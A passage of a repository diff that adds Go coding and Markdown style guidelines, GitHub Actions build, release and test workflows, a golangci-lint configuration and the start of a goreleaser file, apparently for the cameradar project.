- Always close the writer; use `CloseWithError(err)` on failures
|
||||
- `io.Pipe` is for streaming, not rewinding or making readers reusable
|
||||
|
||||
- **Warning:** When using `io.Pipe` (especially with multipart writers), all writes must be performed in strict, sequential order. Do not write concurrently or out of order—multipart boundaries and chunk order must be preserved. Out-of-order or parallel writes can corrupt the stream and result in errors.
|
||||
|
||||
- Streaming multipart/form-data with `io.Pipe`:
|
||||
- `pr, pw := io.Pipe()`; `mw := multipart.NewWriter(pw)`; use `pr` as the HTTP request body
|
||||
- Set `Content-Type` to `mw.FormDataContentType()`
|
||||
- In a goroutine: write all parts to `mw` in the correct order; on error `pw.CloseWithError(err)`; on success `mw.Close()` then `pw.Close()`
|
||||
- Do not store request/in-flight form state on a long-lived client; build per call
|
||||
- Streamed bodies are not rewindable; for retries/redirects, buffer small payloads or provide `GetBody`
|
||||
|
||||
### Profiling
|
||||
|
||||
- Use built-in profiling tools (`pprof`)
|
||||
- Benchmark critical code paths
|
||||
- Profile before optimizing
|
||||
- Focus on algorithmic improvements first
|
||||
- Consider using `testing.B` for benchmarks
|
||||
|
||||
## Testing
|
||||
|
||||
### Test Organization
|
||||
|
||||
- Keep tests in the same package (white-box testing) when testing internals
|
||||
- Use a test package (in the same directory) when testing the public API of the package
|
||||
- Use `_test` package suffix for black-box testing
|
||||
- Name test files with `_test.go` suffix
|
||||
- Place test files next to the code they test
|
||||
|
||||
### Writing Tests
|
||||
|
||||
- Use table-driven tests for multiple test cases
|
||||
- Name tests descriptively using `TestType_MethodName_scenario`
|
||||
- Use subtests with `t.Run` for better organization
|
||||
- Test both success and error cases
|
||||
- Use `testify` or similar libraries when they add value, but don't over-complicate simple tests
|
||||
- Use `testify/mock` for mocking dependencies when necessary
|
||||
|
||||
### Test Helpers
|
||||
|
||||
- Mark helper functions with `t.Helper()`
|
||||
- Create test fixtures for complex setup
|
||||
- Use `testing.TB` interface for functions used in tests and benchmarks
|
||||
- Clean up resources using `t.Cleanup()`
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
### Input Validation
|
||||
|
||||
- Validate all external input
|
||||
- Use strong typing to prevent invalid states
|
||||
- Sanitize data before using in SQL queries
|
||||
- Be careful with file paths from user input
|
||||
- Validate and escape data for different contexts (HTML, SQL, shell)
|
||||
|
||||
### Cryptography
|
||||
|
||||
- Use standard library crypto packages
|
||||
- Don't implement your own cryptography
|
||||
- Use crypto/rand for random number generation
|
||||
- Store passwords using bcrypt, scrypt, or argon2 (consider golang.org/x/crypto for additional options)
|
||||
- Use TLS for network communication
|
||||
|
||||
## Documentation
|
||||
|
||||
### Code Documentation
|
||||
|
||||
- Prioritize self-documenting code through clear naming and structure
|
||||
- Document all exported symbols with clear, concise explanations
|
||||
- Start documentation with the symbol name
|
||||
- Write documentation in English by default
|
||||
- Use examples in documentation when helpful
|
||||
- Keep documentation close to code
|
||||
- Update documentation when code changes
|
||||
- Do not use emoji in documentation and comments
|
||||
|
||||
### README and Documentation Files
|
||||
|
||||
- Include clear setup instructions
|
||||
- Document dependencies and requirements
|
||||
- Provide usage examples
|
||||
- Document configuration options
|
||||
- Include troubleshooting section
|
||||
|
||||
## Tools and Development Workflow
|
||||
|
||||
### Essential Tools
|
||||
|
||||
- `make fmt`: Format code
|
||||
- `make lint`: Additional linting
|
||||
- `make test`: Run tests
|
||||
- `go mod`: Manage dependencies
|
||||
|
||||
### Development Practices
|
||||
|
||||
- Run tests before committing (`make test`)
|
||||
- Run linter before committing (`make lint`)
|
||||
- Keep commits focused and atomic
|
||||
- Write meaningful commit messages
|
||||
- Review diffs before committing
|
||||
|
||||
## Common Pitfalls to Avoid
|
||||
|
||||
- Not checking errors
|
||||
- Ignoring race conditions
|
||||
- Creating goroutine leaks
|
||||
- Not using defer for cleanup
|
||||
- Modifying maps concurrently
|
||||
- Not understanding nil interfaces vs nil pointers
|
||||
- Forgetting to close resources (files, connections)
|
||||
- Using global variables unnecessarily
|
||||
- Over-using unconstrained types (e.g., `any`); prefer specific types or generic type parameters with constraints. If an unconstrained type is required, use `any` rather than `interface{}`
|
||||
- Not considering the zero value of types
|
||||
- **Creating duplicate `package` declarations** - this is a compile error; always check existing files before adding package declarations
|
||||
@@ -0,0 +1,534 @@
|
||||
---
|
||||
description: 'Documentation and content creation standards'
|
||||
applyTo: '**/*.md'
|
||||
---
|
||||
|
||||
## Markdown Content Rules
|
||||
|
||||
The following markdown content rules are enforced in the validators:
|
||||
|
||||
1. **Headings**: Use appropriate heading levels (H2, H3, etc.) to structure your content. Do not use an H1 heading, as this will be generated based on the title.
|
||||
2. **Lists**: Use bullet points or numbered lists for lists. Ensure proper indentation and spacing.
|
||||
3. **Code Blocks**: Use fenced code blocks for code snippets. Specify the language for syntax highlighting.
|
||||
4. **Links**: Use proper markdown syntax for links. Ensure that links are valid and accessible.
|
||||
5. **Images**: Use proper markdown syntax for images. Include alt text for accessibility.
|
||||
6. **Tables**: Use markdown tables for tabular data. Ensure proper formatting and alignment.
|
||||
7. **Line Length**: Limit line length to 400 characters for readability.
|
||||
8. **Whitespace**: Use appropriate whitespace to separate sections and improve readability.
|
||||
9. **Front Matter**: Include YAML front matter at the beginning of the file with required metadata fields.
|
||||
|
||||
## Formatting and Structure
|
||||
|
||||
Follow these guidelines for formatting and structuring your markdown content:
|
||||
|
||||
- **Headings**: Use `##` for H2 and `###` for H3. Ensure that headings are used in a hierarchical manner. Recommend restructuring if content includes H4, and more strongly recommend for H5.
|
||||
- **Lists**: Use `-` for bullet points and `1.` for numbered lists. Indent nested lists with two spaces.
|
||||
- **Code Blocks**: Use triple backticks to create fenced code blocks. Specify the language after the opening backticks for syntax highlighting (e.g., `csharp`).
|
||||
- **Links**: Use `[link text](URL)` for links. Ensure that the link text is descriptive and the URL is valid.
|
||||
- **Images**: Use `` for images. Include a brief description of the image in the alt text.
|
||||
- **Tables**: Use `|` to create tables. Ensure that columns are properly aligned and headers are included.
|
||||
- **Line Length**: Break lines at 80 characters to improve readability. Use soft line breaks for long paragraphs.
|
||||
- **Whitespace**: Use blank lines to separate sections and improve readability. Avoid excessive whitespace.
|
||||
|
||||
## Follow our Guidelines
|
||||
|
||||
### Spelling
|
||||
|
||||
In cases where American spelling differs from Commonwealth/"British" spelling, use the American spelling.
|
||||
|
||||
Although non-American readers tend to be tolerant of reading American spelling in technical documentation,
|
||||
they may find it difficult to have to type American spelling.
|
||||
For example, if your documentation tells a reader who's used to the spelling colour to type color,
|
||||
they may mistype it. So when you use filenames, URLs, and data parameters in examples,
|
||||
try to avoid words that are spelled differently by different groups of English speakers.
|
||||
|
||||
### Write accessibly
|
||||
|
||||
#### Ease of reading
|
||||
|
||||
* Do not force line breaks (hard returns) within sentences and paragraphs.
|
||||
Line breaks might not work well in resized windows or with enlarged text.
|
||||
* Break up walls of text to aid in scannability.
|
||||
For example, separate paragraphs, create headings, and use lists.
|
||||
* Prefer short sentences.
|
||||
* Define acronyms and abbreviations on first usage and if they are used infrequently.
|
||||
* Place distinguishing and important information of a paragraph in the first sentence to aid in scannability.
|
||||
* Use clear and direct language. Avoid the use of double negatives and exceptions in exceptions.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A missing path will not prevent you from continuing.
|
||||
```
|
||||
|
||||
<ul>
|
||||
<li>Double negation (missing, not)</li>
|
||||
<li>Use of future tense (will)</li>
|
||||
</ul>
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
You can continue without a path.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Headings and titles
|
||||
|
||||
Use descriptive headings and titles because they help a reader navigate their browser and the page.
|
||||
It's easier to jump between pages and sections of a page if the headings and titles are unique.
|
||||
|
||||
* Use a heading hierarchy.
|
||||
* Do not skip levels of hierarchy (`h3` can only exist under `h2`)
|
||||
* Do not use empty headings
|
||||
* Use a level-1 heading for the page title.
|
||||
* Use sentence casing for titles and headings.
|
||||
|
||||
#### Links
|
||||
|
||||
* Use meaningful link text. Links should make sense when read out of context.
|
||||
* Do not force links to open in a new tab or window, let the reader decide how to open links.
|
||||
* When possible, avoid adjacent links. Instead, put at least one character in between to separate them.
|
||||
* If a link downloads a file, indicate this action and the file type in the link text.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Use meaningful link text like described [here](https://developers.google.com/style/link-text).
|
||||
Use meaningful link text. [See document.](https://developers.google.com/style/link-text)
|
||||
Use meaningful link text. https://developers.google.com/style/link-text
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Use [meaningful link text](https://developers.google.com/style/link-text).
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Images
|
||||
|
||||
* When possible, use SVG images over any other format, since they are significantly lighter while having perfect information.
|
||||
* For every image, provide alt text that adequately summarizes the intent of each image.
|
||||
* Most of the time, do not present new information in images; always provide an equivalent text explanation with the image. There are of course exceptions for that, such as architecture diagrams, sequence diagrams etc.
|
||||
* Do not repeat images.
|
||||
* Avoid images of text, use text instead.
|
||||
|
||||
#### Tables
|
||||
|
||||
* Introduce tables in the text preceding the table.
|
||||
* Avoid using tables to lay out pages.
|
||||
* If the table contains only a single column, use a list instead.
|
||||
* Do not put tables in the middle of lists or sentences.
|
||||
* Sort rows in a logical order, or alphabetically if there is no logical order.
|
||||
|
||||
### Use the active voice
|
||||
|
||||
In general, use the active voice instead of the passive voice. Make it clear who is performing the action.
|
||||
When using passive voice, it is easy to neglect to indicate who or what is performing the described action.
|
||||
In this kind of construction, it is often hard for readers to figure out who is supposed to do something.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
The service is queried, and an acknowledgment is sent.
|
||||
The service is queried by you, and an acknowledgment is sent by the server.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server sends an acknowledgment.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Exceptions
|
||||
|
||||
In certain cases, it makes more sense to use the passive voice.
|
||||
|
||||
* To emphasize an object over an action.
|
||||
* To de-emphasize a subject or actor.
|
||||
* If your readers do not need to know who is responsible for the action.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
You created over 50 conflicts in the file.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Over 50 conflicts were found in the file.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
The system saved your file.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
The file is saved.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A system administrator purged the database in January.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
The database was purged in January.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
### Write for a global audience
|
||||
|
||||
* Provide context. Do not assume that the reader already knows what you're talking about.
|
||||
* Avoid negative constructions when possible. Consider whether it's necessary to tell the reader what they can't do instead of what they can.
|
||||
* Avoid directional language (for example, above or below) in procedural documentation.
|
||||
This increases maintenance costs and could lead to future modifications breaking the documentation.
|
||||
|
||||
Here are some examples.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
This document makes use of the following terms:
|
||||
```
|
||||
|
||||
Can be substituted for a simpler verb.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
This document uses the following terms:
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
A hybrid cloud-native DevSecOps pipeline
|
||||
```
|
||||
|
||||
Too many nouns as modifiers of another noun. Can be broken into two parts.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
A cloud-native DevSecOps pipeline in a hybrid environment
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Only request one token.
|
||||
```
|
||||
|
||||
Misplaced modifier, makes the sentence less clear and more ambiguous.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Request only one token.
|
||||
Request no more than one token.
|
||||
Request a single token.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
If you use the term green beer in an ad, then make sure that it is targeted.
|
||||
```
|
||||
|
||||
Here, "it is" becomes ambiguous. It could describe the green beer or the ad.
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
If you use the term green beer in an ad, then make sure that the ad is targeted.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Use present tense
|
||||
|
||||
In general, use present tense rather than future tense; in particular, try to avoid using _will_ where possible.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server will send an acknowledgment.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
Send a query to the service. The server sends an acknowledgment.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
Sometimes, of course, future tense is unavoidable because you're actually talking about the future
|
||||
(for example, _This document will be outdated once PR #12345 gets merged._).
|
||||
Attempting to predict the future in a document is usually a bad idea, but sometimes it's necessary.
|
||||
|
||||
However, the fact that the reader will be writing and running code in the future isn't a good reason to use future tense.
|
||||
|
||||
Also avoid the hypothetical future would—for example:
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
You can send an unsubscribe message. The server would then remove you from the mailing list.
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
If you send an unsubscribe message, the server removes you from the mailing list.
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
#### Use clear, precise, unambiguous language
|
||||
|
||||
* Use simple words. For example, do not use words like _commence_ when you mean _start_ or _begin_.
|
||||
* Define abbreviations. Abbreviations can be confusing out of context, and they don't translate well.
|
||||
Spell things out whenever possible, at least the first time that you use a given term.
|
||||
|
||||
#### Be consistent
|
||||
|
||||
If you use a particular term for a particular concept in one place, then use that exact same term elsewhere, including the same capitalization.
|
||||
|
||||
* Use standard English word order. Sentences follow the subject + verb + object order.
|
||||
* Try to keep the main subject and verb as close to the beginning of the sentence as possible.
|
||||
* Use the conditional clause first. If you want to tell the audience to do something in a particular circumstance, mention the circumstance before you provide the instruction.
|
||||
* Make list items consistent. Make list items parallel in structure. Be consistent in your capitalization and punctuation.
|
||||
* Use consistent typographic formats. Use bold and italics consistently. Don't switch from using italics for emphasis to underlining.
|
||||
* Avoid colloquialisms, idioms, or slang. Phrases like ballpark figure, back burner, or hang in there can be confusing to non-native readers.
|
||||
|
||||
### Describe conditions before instructions
|
||||
|
||||
If you want to tell the reader to do something, try to mention the circumstance, conditions, or goal before you provide the instruction.
|
||||
Mentioning the circumstance first lets the reader skip the instruction if it doesn't apply.
|
||||
|
||||
<table>
|
||||
<thead><tr><th>Bad</th><th>Good</th></tr></thead>
|
||||
<tbody>
|
||||
<tr><td>
|
||||
|
||||
```markdown
|
||||
See [link to other document] for more information.
|
||||
Click Delete if you want to delete the entire document.
|
||||
Using custom domains might add noticeable latency to responses if your app is located in one of the following regions:
|
||||
```
|
||||
|
||||
</td><td>
|
||||
|
||||
```markdown
|
||||
For more information, see [link to other document].
|
||||
To delete the entire document, click Delete.
|
||||
If your app is located in one of the following regions, using custom domains might add noticeable latency to responses:
|
||||
```
|
||||
|
||||
</td></tr>
|
||||
</tbody></table>
|
||||
|
||||
### Use lists
|
||||
|
||||
Introduce a list with the appropriate context. In most cases, precede a list with an introductory sentence.
|
||||
|
||||
* Use simple numbered lists for steps to be performed in order.
|
||||
* Nested sequential lists can detail sub-steps as well.
|
||||
* Use bulleted lists when there are no sequences or options.
|
||||
|
||||
### Use code blocks
|
||||
|
||||
In most cases, precede a code sample with an introductory sentence.
|
||||
|
||||
* Do not use tabs to indent code; use spaces only.
|
||||
* Wrap lines at 80 characters if you need to, but try to use shorter lines in code blocks.
|
||||
* Specify the code block language, for syntax highlighting.
|
||||
* If the code block is meant to show a command being run, prefer showing the expected output if applicable.
|
||||
|
||||
### Markdown guidelines
|
||||
|
||||
#### Add spacing to headings
|
||||
|
||||
Prefer spacing after `#` and newlines before and after.
|
||||
|
||||
```markdown
|
||||
...text before.
|
||||
|
||||
# Heading 1
|
||||
|
||||
Text after...
|
||||
```
|
||||
|
||||
#### Use lazy numbering for long lists
|
||||
|
||||
Markdown is smart enough to let the resulting HTML render your numbered lists correctly.
|
||||
For longer lists that may change, especially long nested lists, use _lazy_ numbering.
|
||||
|
||||
```markdown
|
||||
1. Foo.
|
||||
1. Bar.
|
||||
1. Barbaz.
|
||||
1. Barbar.
|
||||
1. Baz.
|
||||
```
|
||||
|
||||
However, if the list is small, and you don’t anticipate changing it, prefer fully numbered lists,
|
||||
because it is nicer to read in source.
|
||||
|
||||
#### Long links
|
||||
|
||||
Long links make source Markdown difficult to read and break the 80 character wrapping. Wherever possible, **shorten your links**.
|
||||
If it is not possible, feel free to reference links at the bottom of the paragraph instead:
|
||||
|
||||
```markdown
|
||||
This paragraph's lines would get very long and difficult to wrap if the [full link] is included inline.
|
||||
|
||||
[full link]:https://www.reallylong.link/rll/BFob89Cv/Owa_TbBBi3Bn9/n5cahxQtC4TOH/afoPnUDyyOS/_8Ilq4zSBjqmo8w/j6UN1uviS9zky
|
||||
```
|
||||
|
||||
#### Prefer lists to tables
|
||||
|
||||
Any tables in your Markdown should be small.
|
||||
Complex, large tables are difficult to read in source and most importantly, a pain to modify later.
|
||||
|
||||
Lists and subheadings usually suffice to present the same information in a slightly less compact,
|
||||
though much more edit-friendly way.
|
||||
|
||||
Here is a bad example:
|
||||
|
||||
```markdown
|
||||
Fruit | Attribute | Notes
|
||||
--- | --- | ---
|
||||
Apple | [Juicy](https://example.com/SomeReallyReallyReallyReallyReallyReallyReallyReallyLongQuery), Firm, Sweet | Apples keep doctors away.
|
||||
Banana | [Convenient](https://example.com/SomeDifferentReallyReallyReallyReallyReallyReallyReallyReallyLongQuery), Soft, Sweet | Contrary to popular belief, most apes prefer mangoes.
|
||||
```
|
||||
|
||||
And here is a better alternative:
|
||||
|
||||
```markdown
|
||||
## Fruits
|
||||
|
||||
### Apple
|
||||
|
||||
* [Juicy](https://SomeReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyReallyLongURL)
|
||||
* Firm
|
||||
* Sweet
|
||||
|
||||
Apples keep doctors away.
|
||||
|
||||
### Banana
|
||||
|
||||
* [Convenient](https://example.com/SomeDifferentReallyReallyReallyReallyReallyReallyReallyReallyLongQuery)
|
||||
* Soft
|
||||
* Sweet
|
||||
|
||||
Contrary to popular belief, most apes prefer mangoes.
|
||||
```
|
||||
|
||||
#### Strongly prefer Markdown to HTML
|
||||
|
||||
Please prefer standard Markdown syntax wherever possible and avoid HTML hacks.
|
||||
If you can not seem to accomplish what you want, reconsider whether you really need it.
|
||||
Except for big tables, Markdown meets almost all needs already.
|
||||
|
||||
Every bit of HTML or Javascript hacking reduces the readability and portability.
|
||||
This in turn limits the usefulness of integrations with other tools, which may either present the source as plain text or render it.
|
||||
|
||||
#### Spacing
|
||||
|
||||
* Remove all trailing whitespaces at end of lines.
|
||||
* Remove instances of multiple consecutive blank lines.
|
||||
* Files should end with a single newline character.
|
||||
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
Ensure compliance with the following validation requirements:
|
||||
|
||||
- **Front Matter**: Include the following fields in the YAML front matter:
|
||||
|
||||
- `post_title`: The title of the post.
|
||||
- `author1`: The primary author of the post.
|
||||
- `post_slug`: The URL slug for the post.
|
||||
- `microsoft_alias`: The Microsoft alias of the author.
|
||||
- `featured_image`: The URL of the featured image.
|
||||
- `categories`: The categories for the post. These categories must be from the list in /categories.txt.
|
||||
- `tags`: The tags for the post.
|
||||
- `ai_note`: Indicate if AI was used in the creation of the post.
|
||||
- `summary`: A brief summary of the post. Recommend a summary based on the content when possible.
|
||||
- `post_date`: The publication date of the post.
|
||||
|
||||
- **Content Rules**: Ensure that the content follows the markdown content rules specified above.
|
||||
- **Formatting**: Ensure that the content is properly formatted and structured according to the guidelines.
|
||||
- **Validation**: Run the validation tools to check for compliance with the rules and guidelines.
|
||||
|
||||
## Admonitions
|
||||
|
||||
Use GitHub-flavored markdown for admonitions: NOTE, WARNING, TIP, IMPORTANT, CAUTION.
|
||||
|
||||
Examples:
|
||||
|
||||
```markdown
|
||||
> [!NOTE]
|
||||
> Highlights information that users should take into account, even when skimming.
|
||||
|
||||
> [!TIP]
|
||||
> Optional information to help a user be more successful.
|
||||
|
||||
> [!IMPORTANT]
|
||||
> Crucial information necessary for users to succeed.
|
||||
|
||||
> [!WARNING]
|
||||
> Critical content demanding immediate user attention due to potential risks.
|
||||
|
||||
> [!CAUTION]
|
||||
> Negative potential consequences of an action.
|
||||
```
|
||||
@@ -0,0 +1,56 @@
|
||||
name: Go Build
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
cache: false
|
||||
|
||||
- name: Cache Go mod
|
||||
id: gomod
|
||||
uses: actions/cache@v5
|
||||
with:
|
||||
path: ~/go/pkg/mod
|
||||
key: ${{ runner.os }}-go-mod-${{ hashFiles('**/go.sum') }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-go-mod-
|
||||
|
||||
- name: Cache Go build
|
||||
uses: actions/cache@v5
|
||||
with:
|
||||
path: ~/.cache/go-build
|
||||
key: ${{ runner.os }}-go-build-${{ github.ref_name }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-go-build-
|
||||
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.gomod.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Run GoReleaser
|
||||
uses: goreleaser/goreleaser-action@v6
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GORELEASER_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
distribution: goreleaser
|
||||
version: ${{ inputs.GORELEASER_VERSION }}
|
||||
args: release --clean --snapshot --skip=docker
|
||||
@@ -0,0 +1,47 @@
|
||||
name: Release
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
|
||||
jobs:
|
||||
release:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: write
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.install-go.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Log in to Docker Hub
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
username: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
|
||||
- name: Run GoReleaser
|
||||
uses: goreleaser/goreleaser-action@v6
|
||||
env:
|
||||
GORELEASER_CURRENT_TAG: ${{ github.ref_name }}
|
||||
DOCKER_REPOSITORY: ullaakut/cameradar
|
||||
DOCKER_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
|
||||
DOCKER_PASSWORD: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
GITHUB_TOKEN: ${{ secrets.GORELEASER_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
distribution: goreleaser
|
||||
version: ${{ inputs.GORELEASER_VERSION }}
|
||||
args: release --clean
|
||||
@@ -0,0 +1,70 @@
|
||||
name: Test
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
id-token: write
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
|
||||
# Go Test looks at `mtime` for caching. `git clone` messes with this. Set it consistently to last commit time.
|
||||
- name: Restore file modification time
|
||||
run: git ls-files -z | while read -d '' path; do touch -d "$(git log -1 --format="@%ct" "$path")" "$path"; done
|
||||
|
||||
# We need to set a cache marker to ensure that the cache is individual for each job.
|
||||
- name: Add Cache Marker
|
||||
run: echo "go-test" > env.txt
|
||||
|
||||
- name: Install Go
|
||||
id: install-go
|
||||
uses: actions/setup-go@v6
|
||||
with:
|
||||
go-version-file: 'go.mod'
|
||||
cache-dependency-path: |
|
||||
go.sum
|
||||
env.txt
|
||||
|
||||
# We trigger mod download separately as otherwise it will count towards
|
||||
# the 1 minute default timeout of golangci-lint. Only needed if there is no cache.
|
||||
- name: Download dependencies
|
||||
run: go mod download
|
||||
if: steps.install-go.outputs.cache-hit != 'true'
|
||||
|
||||
- name: Run Linter
|
||||
uses: golangci/golangci-lint-action@v9
|
||||
with:
|
||||
version: v2.7.2
|
||||
|
||||
- name: Setup gotestsum
|
||||
uses: gertd/action-gotestsum@v3.0.0
|
||||
with:
|
||||
gotestsum_version: v1.13.0
|
||||
|
||||
- name: Download nmap
|
||||
run: sudo apt-get install -y nmap
|
||||
|
||||
- name: Run Tests
|
||||
env:
|
||||
TEST_DIR: ${{ inputs.TEST_DIR }}
|
||||
run: |
|
||||
GOTESTSUM_FLAGS="--junitfile tests.xml --format pkgname -- -cover -race"
|
||||
if [ -z "$TEST_DIR" ]; then
|
||||
gotestsum $GOTESTSUM_FLAGS ./...
|
||||
else
|
||||
gotestsum $GOTESTSUM_FLAGS ./$TEST_DIR/...
|
||||
fi
|
||||
|
||||
- name: Test Summary
|
||||
uses: test-summary/action@v2
|
||||
with:
|
||||
paths: "tests.xml"
|
||||
if: always()
|
||||
+2
-3
@@ -2,6 +2,5 @@
|
||||
.idea/
|
||||
.vscode/
|
||||
|
||||
# Golang
|
||||
/bin/*
|
||||
/pkg/*
|
||||
# Builds
|
||||
dist/
|
||||
+70
-7
@@ -1,7 +1,70 @@
|
||||
# https://github.com/golangci/golangci/wiki/Configuration
|
||||
|
||||
service:
|
||||
project-path: github.com/Ullaakut/cameradar
|
||||
prepare:
|
||||
- apt-get update && apt-get install -y libcurl4-gnutls-dev
|
||||
- dep ensure
|
||||
version: "2"
|
||||
run:
|
||||
tests: false
|
||||
linters:
|
||||
default: all
|
||||
disable:
|
||||
- depguard
|
||||
- dupl
|
||||
- err113
|
||||
- exhaustive
|
||||
- exhaustruct
|
||||
- forcetypeassert
|
||||
- funcorder
|
||||
- funlen
|
||||
- gochecknoglobals
|
||||
- gochecknoinits
|
||||
- gocyclo
|
||||
- godox
|
||||
- gomoddirectives
|
||||
- inamedparam
|
||||
- ireturn
|
||||
- mnd
|
||||
- nilnil
|
||||
- nlreturn
|
||||
- nonamedreturns
|
||||
- tagliatelle
|
||||
- varnamelen
|
||||
- wrapcheck
|
||||
- wsl
|
||||
- wsl_v5
|
||||
settings:
|
||||
cyclop:
|
||||
max-complexity: 15
|
||||
gosec:
|
||||
excludes:
|
||||
- G101
|
||||
- G304
|
||||
- G402
|
||||
lll:
|
||||
line-length: 160
|
||||
tagliatelle:
|
||||
case:
|
||||
rules:
|
||||
json: pascal
|
||||
use-field-name: true
|
||||
exclusions:
|
||||
generated: lax
|
||||
rules:
|
||||
- path: (.+)\.go$
|
||||
text: 'ST1000: at least one file in a package should have a package comment'
|
||||
- path: (.+)\.go$
|
||||
text: 'package-comments: should have a package comment'
|
||||
- path: (.+)\.go$
|
||||
text: 'Error return value of `.+\.Close` is not checked'
|
||||
- linters:
|
||||
- cyclop
|
||||
path: (.+)_test\.go
|
||||
paths: []
|
||||
formatters:
|
||||
enable:
|
||||
- gci
|
||||
- gofmt
|
||||
- gofumpt
|
||||
- goimports
|
||||
settings:
|
||||
gofumpt:
|
||||
extra-rules: true
|
||||
exclusions:
|
||||
generated: lax
|
||||
paths: []
|
||||
|
||||
+100
@@ -0,0 +1,100 @@
|
||||
version: 2
|
||||
project_name: cameradar
|
||||
dist: dist/cameradar
|
||||
|
||||
env:
|
||||
- GO111MODULE=on
|
||||
before:
|
||||
hooks:
|
||||
- go mod download
|
||||
|
||||
builds:
|
||||
- binary: cameradar
|
||||
main: ./cmd/cameradar
|
||||
env:
|
||||
